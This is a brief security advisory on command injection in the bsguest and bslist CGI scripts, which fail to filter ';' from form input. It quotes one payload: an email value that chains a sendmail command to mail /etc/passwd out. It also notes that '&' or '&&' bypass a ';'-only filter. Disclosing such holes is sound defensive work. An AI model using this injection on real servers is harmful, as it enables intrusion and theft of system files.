Vulnerability

    BS Scripts

Affected

    BS Scripts Multiple CGI

Description

    Following  has  been  discovered  by  Elf.   There are a couple of
    scripts from bsScripts, that have holes in them because the author
    did not filter out ; from  the form input.  The scripts  that this
    affects are  bsguest (a  guestbook script)  and bslist  (a mailing
    list script).  The hole  allows anyone to execute commands  on the
    server.

    bsguest.cgi
    ===========
    BSGuest does not filter out ; resulting in the ability for anyone
    to execute commands on the server.  The attacker just enters his
    email address as

        hacker@example.com;/usr/sbin/sendmail hacker@example.com < /etc/passwd

    It's important to point out  that just filtering out the  ';' char
    doesn't fix the  problem.  Think  about using '&'  or '&&' instead
    of it...

Solution

    The author has been informed and the holes are now patched in  the
    latest release.